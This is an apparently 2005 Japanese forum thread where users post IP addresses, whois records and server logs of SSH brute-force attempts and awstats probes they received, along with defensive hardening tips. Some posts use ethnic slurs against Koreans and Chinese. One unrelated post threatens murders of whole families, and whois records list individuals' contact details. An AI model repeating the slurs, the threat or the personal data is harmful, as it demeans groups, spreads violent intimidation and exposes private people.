誰かのPCがウイルスに感染していて、
周辺のIPを次の感染攻撃対象探しでパケット流したり。
だいたい、これらのうちのどれかのパケットが流れてきている。
まあ、今ではたいがいネットにつなげて勝手に流れてくるパケットは、
もうほとんどが危険かつ有害だから弾くにこしたことはない。
ラブレターウイルスとかの時代は平和だったよ・・・
今時、ウイルスメールのほうが珍しくなってる・・・
107 :
名無しさん@お腹いっぱい。 :2005/06/13(月) 22:25:58
佐賀県から80番を探りにきてるのがいる…
64.4.25.83 ホスト名 baym-td2.msgr.hotmail.com IPアドレス 割当国 ※ アメリカ合衆国 (US)
109 :
104 :2005/06/14(火) 08:53:23
>>106 丁寧にありがとう。
なんとなくわかったような、わかんないような。。
ウイルスメールなんて怖くないけど、潜入の試みなんてされるのは
なんか物凄く怖い感じする。
110 :
名無しさん@お腹いっぱい。 :2005/06/14(火) 09:10:00
不正アクセスされてるとホストは変わるの?
意味がわからん
114 :
名無しさん@お腹いっぱい。 :2005/06/14(火) 23:38:51
115 :
名無しさん@お腹いっぱい。 :2005/06/15(水) 00:07:03
あなたが検索されたアドレス[ 211.135.73.111 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 211.135.68.0-211.135.79.255 b. [ネットワーク名] SUTV-NET f. [組織名] 吹田ケーブルテレビジョン株式会社 g. [Organization] Suita Cable Television co.,Ltd. m. [管理者連絡窓口] SS6012JP n. [技術連絡担当者] SS6012JP p. [ネームサーバ] dns01.zaq.ne.jp p. [ネームサーバ] dns02.zaq.ne.jp [割当年月日] 2000/10/20 [最終更新] 2003/05/14 14:32:38(JST) 上位情報 ---------- 関西マルチメディアサービス株式会社 (KANSAI MULTIMEDIA SERVICE COMPANY) [割り振り] 211.135.0.0/17
116 :
名無しさん@お腹いっぱい。 :2005/06/15(水) 00:19:26
PING 211.135.73.111 (211.135.73.111) from 216.133.236.195 : 56(84) bytes of data. 64 bytes from 211.135.73.111: icmp_seq=0 ttl=49 time=720.793 msec 64 bytes from 211.135.73.111: icmp_seq=1 ttl=49 time=619.910 msec 64 bytes from 211.135.73.111: icmp_seq=2 ttl=49 time=248.401 msec 64 bytes from 211.135.73.111: icmp_seq=3 ttl=49 time=575.700 msec 64 bytes from 211.135.73.111: icmp_seq=4 ttl=49 time=707.035 msec 64 bytes from 211.135.73.111: icmp_seq=5 ttl=49 time=925.889 msec 64 bytes from 211.135.73.111: icmp_seq=6 ttl=49 time=509.734 msec 64 bytes from 211.135.73.111: icmp_seq=7 ttl=49 time=349.318 msec 64 bytes from 211.135.73.111: icmp_seq=8 ttl=49 time=357.641 msec 64 bytes from 211.135.73.111: icmp_seq=9 ttl=49 time=142.198 msec
検索結果 IPアドレス 203.95.1.138 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 執拗にsshを攻撃してくる。 どうしたもんだかな。
inetnum: 203.95.0.0 - 203.95.7.255
netname: STN-CN
descr: Science & Technology Network Communication Co., Ltd.
descr: 6F/7F, No.1525, Rd.Zhongshan(w),
descr: Shanghai,China 200235
country: CN
admin-c: XX67-AP
tech-c: XX67-AP
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CN-STNC
mnt-routes: MAINT-CN-STNC
status: ALLOCATED PORTABLE
remarks: member reopened
changed:
[email protected] 19960229
changed:
[email protected] 20030515
changed:
[email protected] 20040901
source: APNIC
person: xiaobin xiao
address: 6F,1525 West Zhongshan Road,Shanghai 200235
country: CN
phone: +86-21-64870880-887
fax-no: +86-21-64640756
e-mail:
[email protected] nic-hdl: XX67-AP
mnt-by: MAINT-CN-STNC
changed:
[email protected] 20030515
source: APNIC
119 :
名無しさん@お腹いっぱい。 :2005/06/15(水) 07:46:28
そんなに頻繁に攻撃されるんなら ipを変えればいいじゃん 設定がめんどうだけど
>>120 IP変えても同じ。ネットに繋いだ瞬間から攻撃が始まる。
>>117 OSは何? UNIX系なら、/etc/hosts.{allow,deny}で落としておけば、
同じとこからは1回だけでしょ。Windowsでどうやるのかは知らないけど。
123 :
名無しさん@お腹いっぱい。 :2005/06/15(水) 19:42:20
IPアドレス 210.238.171.1 ホスト名 E171001.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 宮城県 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.238.171.0/24 b. [ネットワーク名] KDDI-NET f. [組織名] DION (KDDI株式会社) g. [Organization] DION (KDDI CORPORATION)
124 :
名無しさん@お腹いっぱい。 :2005/06/15(水) 20:23:02
IPアドレス 210.251.73.249 ホスト名 登録なし Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.251.73.240/28 b. [ネットワーク名] TOKYOSOFT f. [組織名] 東京ソフト株式会社 g. [Organization] Tokyo Soft Co.,Ltd.
>>122 Windowsでサーバなんてやったことないから知らないけど
Windowsでsshd動くの? ググってもクライアントしかない。
127 :
名無しさん@お腹いっぱい。 :2005/06/16(木) 08:24:35
IPアドレス 210.230.154.43 ホスト名 B154043.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 福岡県 市外局番 092 接続回線 ダイヤルアップ
>>126 「windows sshd」で検索掛けてみるとあるみたいよ。
うちはLinuxだけどこんな感じにしてます。
・外部からsshログインできるのは1台のみ
・そのマシンと他のマシンとは同ユーザ名でもパスワードを必ず違えておく
・許可するsshアクセスはJPNIC管轄もしくはAPNICのJPNIC管理分のIPアドレスからのみ(TCP wrapperで制御)
・外部からsshログインできるユーザを特定ユーザのみに制限(/etc/security/access.confほか)
・接続要求数を制限(sshd_config)
129 :
名無しさん@お腹いっぱい。 :2005/06/16(木) 15:53:02
IPアドレス 210.251.5.136 ホスト名 G005136.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 光
130 :
名無しさん@お腹いっぱい。 :2005/06/16(木) 17:43:59
IPアドレス 210.251.21.203 ホスト名 G021203.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 ダイヤルアップ
埼玉多くね?ww
132 :
名無しさん@お腹いっぱい。 :2005/06/16(木) 20:06:56
また、埼玉糞野郎! IPアドレス 210.251.5.136 ホスト名 G005136.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 光
133 :
名無しさん@お腹いっぱい。 :2005/06/16(木) 20:55:42
IPアドレス 203.141.37.249 ホスト名 img4.img.vip.bbt.yahoo.co.jp IPアドレス割当国 ※ 日本 (JP) yahooって、どういうことだろ?
134 :
名無しさん@お腹いっぱい。 :2005/06/16(木) 21:19:33
IPアドレス 65.214.44.103 ホスト名 egspd42122.ask.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし 俺の80番ポートになにようでっかw
135 :
名無しさん@お腹いっぱい。 :2005/06/17(金) 00:27:49
136 :
名無しさん@お腹いっぱい。 :2005/06/17(金) 00:31:20
219.31.158.19 今来たんだけどこれお願いします
137 :
名無しさん@お腹いっぱい。 :2005/06/17(金) 01:54:57
61.152.158.150 netname: SHANGHAI-GLOBAL-NET descr: Shanghai Global Network Co., Ltd. country: CN 最近このSHANGHAI-GLOBAL-NETから毎日アタックきてるんだけど… バスターとかで国家単位ではじけねーもんかなぁ。
138 :
名無しさん@お腹いっぱい。 :2005/06/17(金) 04:17:41
HTTPでawstatsのディレクトリを探して狙ってくるのは何か穴があるのかな? 212.58.29.124 222.106.128.38 212.247.22.41 202.57.88.82 194.248.137.8 65.110.39.201 65.110.60.90 61.242.218.20 203.198.215.114 84.243.3.50 218.38.19.164 211.105.221.84
139 :
名無しさん@お腹いっぱい。 :2005/06/17(金) 05:11:09
222.108.48.113 まじ氏ね
「awstats セキュリティホール」でモロでしたね。使ってないからいいけど。
220.220.227.216朝から800回以上もくるな このきちがい。
ZoneAlarm日本語版 5.5.109.000登場!
143 :
名無しさん@お腹いっぱい。 :2005/06/17(金) 19:33:36
IPアドレス 210.251.4.81 ホスト名 G004081.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 栃木県 市外局番 -- 接続回線 xDSL
144 :
名無しさん@お腹いっぱい。 :2005/06/17(金) 19:37:42
222.171.18.61 チャンコロメールサーバー
145 :
名無しさん@お腹いっぱい。 :2005/06/17(金) 19:50:06
IPアドレス 210.251.5.60 ホスト名 G005060.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線
146 :
名無しさん@お腹いっぱい。 :2005/06/18(土) 02:10:11
IPアドレス 210.251.9.131 ホスト名 G009131.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 --
147 :
名無しさん@お腹いっぱい。 :2005/06/18(土) 21:14:30
59.56.70.58 中国から猛烈にアタックきた。
148 :
名無しさん@お腹いっぱい。 :2005/06/18(土) 21:32:30
IPアドレス 210.251.16.132 ホスト名 G016132.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 種別不明
IPアドレス 210.80.243.10 ホスト名 imgu05.img.vip.mci.yahoo.co.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし 6時間以上ずっとだけどこいつ何よ?
150 :
名無しさん@お腹いっぱい。 :2005/06/19(日) 03:44:37
203.154.220.21 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ タイ (TH) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
sshd: Authentication Failures: unknown (tn38.tokyonetworks.net): 92 Time(s) root (tn38.tokyonetworks.net): 17 Time(s) admin (tn38.tokyonetworks.net): 7 Time(s) ftp (tn38.tokyonetworks.net): 3 Time(s) news (tn38.tokyonetworks.net): 2 Time(s) postgres (tn38.tokyonetworks.net): 2 Time(s) adm (tn38.tokyonetworks.net): 1 Time(s) apache (tn38.tokyonetworks.net): 1 Time(s) games (tn38.tokyonetworks.net): 1 Time(s) mail (tn38.tokyonetworks.net): 1 Time(s) nobody (tn38.tokyonetworks.net): 1 Time(s) operator (tn38.tokyonetworks.net): 1 Time(s) sshd (tn38.tokyonetworks.net): 1 Time(s) Invalid Users: Unknown Account: 92 Time(s)
153 :
名無しさん@お腹いっぱい。 :2005/06/19(日) 12:17:30
239.255.255.250 こいつ相当うぜえ。 1日1000回以上の攻撃が数ヶ月間一日欠かさずやってくる。 何とかしてくれ!
154 :
名無しさん@お腹いっぱい。 :2005/06/19(日) 12:35:21
さっき調べたら239.255.255.250って不正アクセスじゃないんだな。
>>153 は無しと言う事でorz。
155 :
名無しさん@お腹いっぱい。 :2005/06/19(日) 14:07:47
IPアドレス 61.2.211.151 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ インド (IN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
TCP SYN FLOODとポートスキャン また半島からったくuzeee IPアドレス 222.96.155.39 ホスト名 bs-c1-node11.mxm.net IPアドレス 割当国 ※ 韓国 (KR) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
157 :
名無しさん@お腹いっぱい。 :2005/06/20(月) 00:16:02
なんかやたらasn.1を叩いてくるんだけど。 新手の自動拡散ウイルスか? 210.132.197.227 a. [IPネットワークアドレス] 210.132.192.0/18 b. [ネットワーク名] SO-NET f. [組織名] SO-Net サービス 上位情報 ---------- ソニーコミュニケーションネットワーク株式会社 (Sony Communication Network Corporation) [割り振り] 210.132.128.0/17
158 :
名無しさん@お腹いっぱい。 :2005/06/20(月) 04:36:14
host218-143.pool8174.interbusiness.it[81.74.143.218] から ftpd に集中攻撃。
159 :
名無しさん@お腹いっぱい。 :2005/06/20(月) 13:16:36
IPアドレス 59.128.194.229 IPアドレス 割当国 ※ 日本 (JP) 都道府県 兵庫県 市外局番 -- 接続回線 光 80番をつつきにきた
YahooBB219208026001.bbtec.net
161 :
名無しさん@お腹いっぱい。 :2005/06/20(月) 16:24:11
DCOM Exploit attack IPアドレス 61.205.159.193 ホスト名 zaq3dcd9fc1.zaq.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 大阪府 市外局番 06 接続回線 CATV 61.205.〜で始まるIP複数から
ntkyto037067.kyto.nt.ftth.ppp.infoweb.ne.jp
あなたが検索されたアドレス[ 222.150.69.61 ]のJPNICからの応答は以下の通りです。 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 222.150.0.0/16 b. [ネットワーク名] PLALA f. [組織名] 株式会社 ぷららネットワークス g. [Organization] Plala Networks Inc. m. [管理者連絡窓口] MN2905JP n. [技術連絡担当者] HS3694JP p. [ネームサーバ] dns1.plala.or.jp p. [ネームサーバ] dns2.plala.or.jp p. [ネームサーバ] ns-tk061.ocn.ad.jp [割当年月日] 2004/01/26 [最終更新] 2004/01/29 12:20:06(JST) 上位情報 ---------- エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION) [割り振り] 222.144.0.0/13
164 :
名無しさん@お腹いっぱい。 :2005/06/20(月) 23:00:33
192.168.0.1からの攻撃は、どうやったら対応できますか?
IPアドレス 221.113.37.173 ホスト名 p037173.ppp.asahi-net.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 東京都 市外局番 -- 接続回線 光
166 :
名無しさん@お腹いっぱい。 :2005/06/21(火) 00:42:48
>>164 とりあえず、持ってるPCとルーターなどの類を全て窓から投げ捨てろ。
167 :
名無しさん@お腹いっぱい。 :2005/06/21(火) 01:54:46
p5190-ipad03sizuokaden.shizuoka.ocn.ne.jp --> TCPポート:5554
168 :
名無しさん@お腹いっぱい。 :2005/06/21(火) 03:30:54
>>164 192.168.0.2〜244で対応せよ!。
169 :
名無しさん@お腹いっぱい。 :2005/06/21(火) 09:55:52
なんか最近、半島IPが1026〜1027をつつきにくるんだけど、なんか流行ってるの? それとも俺が何かに感染してるのか!?
メモ 207.46.253.188
最近、sshdにピンポンダッシュしてくる半島人が多いこと多いこと FWとhostsで半島と大陸抑制したら、こんなんが出てきました Jun 20 20:07:30 202.222.31.73 さーて、どうしようかな。。。と
172 :
名無しさん@お腹いっぱい。 :2005/06/21(火) 22:51:45
IPアドレス 222.149.20.185 ホスト名 p3185-ipbf307hodogaya.kanagawa.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 神奈川県 市外局番 -- 接続回線 光
173 :
名無しさん@お腹いっぱい。 :2005/06/22(水) 03:18:47
Jun 21 01:04:14 trapserver sshd[5305]: refused connect from d245222.ppp.asahi-net.or.jp Jun 21 01:10:48 trapserver sshd[4839]: refused connect from d245222.ppp.asahi-net.or.jp ごくろうさん
まぁ今危ぶまれている年間自殺者3万人なんていうのもさぁ 何だかんだ言ってお友達と楽しく戯れていた全共闘世代のジジイがほとんどで そんな奴らのノスタルジーとニートの絶望的な孤独を一緒にされちゃあかなわないよね。 まぁ政府も腹の底じゃあ、このままズルズルと大人になって勝手に死んでくれりゃあ本望 とか思ってるだろうケドさあ、俺達には一人一人明確な敵がいるんだよね。 原因があっての結果。 勉強しなきゃ立派な大人になれませんよなんて乳幼児でも知ってることを やらなかったらこうなった、なんて言い切れるほど楽天家じゃないんだよね。 アホみたいな受験戦争、家畜のような体罰教育、友達からの陰湿なイジメ、見知らぬ大人のいやがらせ バブル期に子供にだけ苦労させて親やセンセや同級生は泡まみれで遊び放題。 敷かれたレールの先に娯楽があると鞭打たれ、苦難を乗り越えたどり着いたら就職難。 ゴミのように切り捨てられていく俺らの10代、20代。 いつの間にか自分より馬鹿が出世して、自分よりブサイクが結婚し、自分より足の遅いヤツがオリンピックに出ている。 両親を恨む者、先生の居所を探す者、同僚の近況を探る者、誰でもいいから殺してやりたいと思っている者 そんなヤツらがじっと己の部屋で計画を練っている。 まぁはっきり言わせてもらえば、あんたら、幸せ家族を気取っているのも今のうちだね。 鬱ブームだかなんだか知らないが、テレビ一つ落ち着いて見られなかったような俺らに 勝者、敗者とか貧乏さん番組なんてメディア戦略は通用しないね。 殺されるまえに、必ず殺す。 そう、この先10年。被害者の過去2-30年を遡らないと犯人が割り出せない 一家まるごと惨殺事件が続くだろうね・・
175 :
名無しさん@お腹いっぱい。 :2005/06/22(水) 11:17:57
65.54.183.192 ホスト名 loginnet.passport.com IPアドレス 割当国 ※ アメリカ合衆国 (US)
176 :
名無しさん@お腹いっぱい。 :2005/06/22(水) 11:18:53
65.54.239.141 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ アメリカ合衆国 (US)
177 :
名無しさん@お腹いっぱい。 :2005/06/22(水) 11:19:28
65.54.179.192 ホスト名 loginnet.passport.com IPアドレス 割当国 ※ アメリカ合衆国 (US)
178 :
名無しさん@お腹いっぱい。 :2005/06/22(水) 11:21:04
IPアドレス 207.46.5.11 ホスト名 baym-gw39.msgr.hotmail.com IPアドレス 割当国 ※ アメリカ合衆国 (US IPアドレス 211.13.215.203 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 日本 (JP)
179 :
名無しさん@お腹いっぱい。 :2005/06/22(水) 11:21:45
IPアドレス 65.54.183.192 ホスト名 loginnet.passport.com IPアドレス 割当国 ※ アメリカ合衆国 (US)
06/21 IPアドレス: 222.145.138.59 ホスト名: p1059-ipbf601marunouchi.tokyo.ocn.ne.jp 06/22 IPアドレス: 219.102.176.128 ホスト名: pl128.nas922.o-tokyo.nttpc.ne.jp ともに、HTTP/1.0 の "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" サイトを根こそぎ持っていく。robots.txtではじいているようなCGIまで無数に起動してうざい。 おそらくメールアドレス収集のロボット。Yahooのプロフからたどって来ている。 httpsのGETがまともに出来ない。
SSHで入ろうとしてる奴 Name: p1084-ipbf613marunouchi.tokyo.ocn.ne.jp Address: 222.149.224.84 Name: tec.kytec.com Address: 67.19.101.162
183 :
名無しさん@お腹いっぱい。 :2005/06/22(水) 19:02:40
IPアドレス 202.231.115.212 ホスト名 d212.HsaitamaFL4.vectant.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 光
184 :
名無しさん@お腹いっぱい。 :2005/06/22(水) 19:29:30
185 :
名無しさん@お腹いっぱい。 :2005/06/23(木) 20:39:19
218.113.32.14 日本キタ━━━━(゚∀゚)━━━━!!
186 :
名無しさん@お腹いっぱい。 :2005/06/23(木) 21:29:48
220.151.58.29 日本キタ━━━━(゚∀゚)━━━━!!
61.204.96.3 日本キタ━━━━(゚∀゚)━━━━!!
220.102.139.230 日本キタ━━━━(゚∀゚)━━━━!!
218.181.184.83 日本キタ━━━━(゚∀゚)━━━━!!
218.224.83.212 日本キタ━━━━(゚∀゚)━━━━!!
211.120.74.62 219.215.12.21 日本キタ━━━━(゚∀゚)━━━━!!
192 :
名無しさん@お腹いっぱい。 :2005/06/24(金) 13:57:46
2005/06/24(00:06:23) W-SV 222.143.1.131 [80] 302 26 "GET / HTTP/1.0" 2005/06/24(12:31:51) W-SV 222.245.97.227 [80] 302 26 "GET / HTTP/1.0" 2005/06/24(13:44:50) W-SV 222.76.91.163 [80] 302 26 "GET / HTTP/1.0" 最近こういうアクセスが増えてきた。 現在のIPが222で始まるからなのかな?
59.190.42.173 eonet
おまいら、ポート445あてを不正アクセスと勘違いしてないか? ポート445はファイル共有。 ルーターとかFWの付いてないPCだと、そのまま外部にパケット垂れ流し。 プロバイダのネットワークアドレスが同じ、つまり、自分と同じプロバイダの会員からなら正常の 可能性大だ。
>>192 それは関係ないと思われ。
ポートスキャンの結果、セキュリティが甘いと思われ、中国からしつこく偵察を受けてる予感。
ポートスキャン用のソフトによっては、apacheとかのソフト名、バージョンを表示するのがあり、そ
れで甘いと判断されたんだろうな。
中国からのロボット検索とは思えない。
IPアドレス: 59.190.22.185 ホスト名: 59-190-22-185.eonet.ne.jp 割当国: 日本 (JP) 都道府県: 不明 市外局番: -- 接続回線: 光 eoネットはアフォのスクツか?
202.214.174.100
inetnum: 211.54.0.0 - 211.59.255.255 netname: KRNIC-KR descr: KRNIC descr: Korea Network Information Center country: KR
IPアドレス 222.89.109.74 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし CNとKRは氏ね
205.209.128.26
220.113.97.253
IPアドレス 63.241.10.39 ホスト名 ttmkoll2.equip.icdsatt.net IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし しつこいぞ
203 :
名無しさん@お腹いっぱい。 :2005/06/26(日) 20:31:59
Jun 21 18:04:56 hoge sshd[6744]: Connection from 193.229.235.107 port 39817 Jun 21 18:04:58 hoge sshd[6739]: Invalid user kohana from 85.35.32.10 Jun 21 18:04:58 hoge sshd[6741]: Invalid user kuni from 62.119.154.15 Jun 21 18:04:58 hoge sshd[6743]: Invalid user kuri from 80.116.199.93 同時刻に4箇所から不正アクセスされてワロスww 最近は日本のユーザ名辞書搭載してんのね
っつーかsshでPasswordAuthentication使ってる香具師はアフォ
じゃ、sshd開放してる大抵のレン鯖はアホだな。
inetnum: 61.232.0.0 - 61.237.255.255
netname: CRTC
country: CN
descr: CHINA RAILWAY TELECOMMUNICATIONS CENTER
admin-c: LQ112-AP
tech-c: LM273-AP
status: ALLOCATED PORTABLE
changed:
[email protected] 20030121
mnt-by: MAINT-CNNIC-AP
source: APNIC
person: LV QIANG
nic-hdl: LQ112-AP
e-mail:
[email protected] address: 22F Yuetan Mansion,Xicheng District,Beijing,P.R.China
phone: +86-10-51890499
fax-no: +86-10-51890674
country: CN
changed:
[email protected] 20050623
mnt-by: MAINT-CNNIC-AP
source: APNIC
person: liu min
nic-hdl: LM273-AP
e-mail:
[email protected] address: 22F Yuetan Mansion,Xicheng District,Beijing,P.R.China
phone: +86-10-51848796
fax-no: +86-10-51842426
country: CN
changed:
[email protected] 20041208
mnt-by: MAINT-CNNIC-AP
source: APNIC
東京のバカタレのようだ。
inetnum: 219.96.0.0 - p000.net219096000.tnc.ne.jp
netname: JPNIC-NET-JP
descr: Japan Network Information Center
country: JP
admin-c: JNIC1-AP
tech-c: JNIC1-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-JPNIC
changed:
[email protected] 20020307
status: ALLOCATED PORTABLE
source: APNIC
sshd: Invalid Users: Unknown Account: 116 Time(s) Authentication Failures: unknown (210.179.89.100 ): 2 Time(s) postgres (alaska.med.hokudai.ac.jp ): 12 Time(s) ftp (alaska.med.hokudai.ac.jp ): 11 Time(s) root (211.20.17.141 ): 1 Time(s) daemon (alaska.med.hokudai.ac.jp ): 18 Time(s) unknown (alaska.med.hokudai.ac.jp ): 114 Time(s) apache (alaska.med.hokudai.ac.jp ): 11 Time(s) bin (alaska.med.hokudai.ac.jp ): 23 Time(s) root (alaska.med.hokudai.ac.jp ): 51 Time(s)
大陸から TCP Port 10000 に激しくアタックされてる件について
210 :
192 :2005/06/27(月) 15:40:24
>>195 2005/06/27(02:09:42) W-SV 222.187.114.2 [80] 400 0 "GET http//219.133.51.40/getimage?0.8821770718181844 HTTP/1.1"
2005/06/27(12:50:55) W-SV host182.cbnyisc.com(65.206.91.182) [80] 302 26 "GET / HTTP/1.0"
2005/06/27(15:20:23) W-SV 211.46.42.10 [80] 302 26 "GET / HTTP/1.0"
15時過ぎにIPアドレス変えたら(222.*→211.*)さっそくきた。
ポートスキャン房うぜー
61.152.158.122. 61.152.158.124. 61.152.158.150. 61.152.160.63. 何こいつ
reverse.theplanet.comってなにもの? 毎日ものすごい数のアクセスがあるんだが・・・・・。 IPアドレス 70.85.180.18 ホスト名 18.70-85-180.reverse.theplanet.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
213 :
:2005/06/27(月) 16:56:58
キチガイ、死ね IPアドレス 219.109.106.107 ホスト名 cm107.cavy35.catvnet.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 香川県 市外局番 087 接続回線 CATV
214 :
名無しさん@お腹いっぱい。 :2005/06/27(月) 17:36:37
sshdでパスワードを使う理由は sftpとかで活用するためだよー。いちいち公開鍵とかやんのマンドクセ
scp 使えばいいのに
普通のftpはパスワード垂れ流しなので暗号化されるsftpのほうが安全デスヨ! って言って客に使わせてるんだからscpなんて教えられるわけねーだろ!!
ったく何なんだ、このクソは。不正アクセスしてくんなボケ。
inetnum: 219.96.0.0 - 219.127.255.255 P139084.doubleroute.jp
netname: JPNIC-NET-JP
descr: Japan Network Information Center
country: JP
admin-c: JNIC1-AP
tech-c: JNIC1-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-JPNIC
changed:
[email protected] 20020307
status: ALLOCATED PORTABLE
source: APNIC
IPアドレス 216.35.71.116 ホスト名 demo.linksynergy.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし ヤンキー氏ね
61.125.121.141 61.195.96.160 61.195.97.88 61.195.100.144 61.195.103.116 61.195.105.144 61.195.121.224 61.195.125.84 61.195.124.98 61.195.125.84 218.251.67.77 eoネットが多いなあ
220 :
名無しさん@お腹いっぱい。 :2005/06/28(火) 22:58:05
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.174.200.0/24 b. [ネットワーク名] PIONEER f. [組織名] パイオニア株式会社 g. [Organization] PIONEER CORPORATION m. [管理者連絡窓口] MO4288JP n. [技術連絡担当者] KS3666JP n. [技術連絡担当者] SK7758JP p. [ネームサーバ] pi0.pioneer.co.jp p. [ネームサーバ] pi1.pioneer.co.jp [割当年月日] 2001/11/06 [最終更新] 2004/02/27 16:23:05(JST) 上位情報 ---------- 日本テレコム株式会社 (JAPAN TELECOM CO.,LTD.) [割り振り] 210.174.128.0/17
221 :
名無しさん@お腹いっぱい。 :2005/06/28(火) 22:59:21
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 202.224.135.0/25 b. [ネットワーク名] MEI-NET f. [組織名] 松下電器産業株式会社 g. [Organization] Matsushita Electric Industrial Co., Ltd. m. [管理者連絡窓口] YS9001JP n. [技術連絡担当者] KK14783JP p. [ネームサーバ] [割当年月日] 2004/02/27 [最終更新] 2005/05/27 11:59:13(JST) 上位情報 ---------- パナソニック ネットワークサービシズ株式会社 (Panasonic Network Services Inc.) [割り振り] 202.224.128.0/18 パナソニック ネットワークサービシズ株式会社 (Panasonic Network Services Inc.) SUBA-066-010 [SUBA] 202.224.135.0/24
211.207.48.24 HANANET KOREA クソチョンがウザいんじゃ
223 :
名無しさん@お腹いっぱい。 :2005/06/29(水) 00:40:25
224 :
名無しさん@お腹いっぱい。 :2005/06/29(水) 02:39:35
219.128.54.60
226 :
名無しさん@お腹いっぱい。 :2005/06/29(水) 11:03:57
2005/06/28(20:44:12) W-SV 211.34.253.29 [80] 404 0 "GET /cgi-bin/awstats/awstats.pl HTTP/1.1" 2005/06/28(20:44:23) W-SV 211.34.253.29 [80] 404 0 "GET /cgi/awstats.pl HTTP/1.1" 2005/06/28(20:44:26) W-SV 211.34.253.29 [80] 302 29 "GET /cgi-bin/awstats.pl HTTP/1.1" 2005/06/28(20:44:29) W-SV 211.34.253.29 [80] 404 0 "GET /awstats/awstats.pl HTTP/1.1" 2005/06/28(20:44:35) W-SV 211.34.253.29 [80] 404 0 "GET /cgi-bin/stats/awstats.pl HTTP/1.1" 2005/06/28(20:44:41) W-SV 211.34.253.29 [80] 404 0 "GET /stats/awstats.pl HTTP/1.1" 2005/06/28(20:44:47) W-SV 211.34.253.29 [80] 404 0 "GET /awstats.pl HTTP/1.1" 2005/06/28(20:44:53) W-SV 211.34.253.29 [80] 404 0 "GET /cgi/stats/awstats.pl HTTP/1.1" ↑Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) 2005/06/29(10:06:29) W-SV 211.34.18.135 [80] 302 26 "GET / HTTP/1.0" こういうのどうにかならないのかな。 アクセス解析のスクリプトか何かなのかな。 ダミー作ってログ取ってるけど。
>>226 awstatsのセキュリティホールを狙ったものですな。>140
httpにくるやつは基本的にIPアドレスでアクセスしてくるから、
バーチャルホストで設定して一番最初のコンテナをダミーにしておけばOKよん。
二番目以降のコンテナでリアルなサイトを設定すべし。
218.65.110.12 最近攻撃受けてる
127.0.0.1 これは何ですか?毎日来ます。
229 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/06/29(水) 15:07:45 127.0.0.1 これは何ですか?毎日来ます。
>>229 それは大変だ、なんか動いてるぞ!
あと、0.0.0.0からもあるだろ?
229 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/06/29(水) 15:07:45 127.0.0.1 これは何ですか?毎日来ます。 229 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/06/29(水) 15:07:45 127.0.0.1 これは何ですか?毎日来ます。 229 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/06/29(水) 15:07:45 127.0.0.1 これは何ですか?毎日来ます。
IPアドレス 202.93.87.249 ホスト名 w01.geo.vip.bbt.yahoo.co.jp Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 202.93.64.0/19 b. [ネットワーク名] YAHOO-NET f. [組織名] ヤフー株式会社 g. [Organization] Yahoo Japan Corp. m. [管理者連絡窓口] TT9944JP n. [技術連絡担当者] TT9944JP p. [ネームサーバ] dnsg01.yahoo.co.jp p. [ネームサーバ] dnsn201.yahoo.co.jp [割当年月日] 2004/04/30 [返却年月日] [最終更新] 2005/03/17 12:20:03(JST) 上位情報 ---------- 株式会社ブロードバンドタワー (BroadBand Tower, Inc.) [割り振り] 202.93.64.0/19 下位情報 ---------- 該当するデータがありません。
234 :
名無しさん@お腹いっぱい。 :2005/06/29(水) 17:32:09
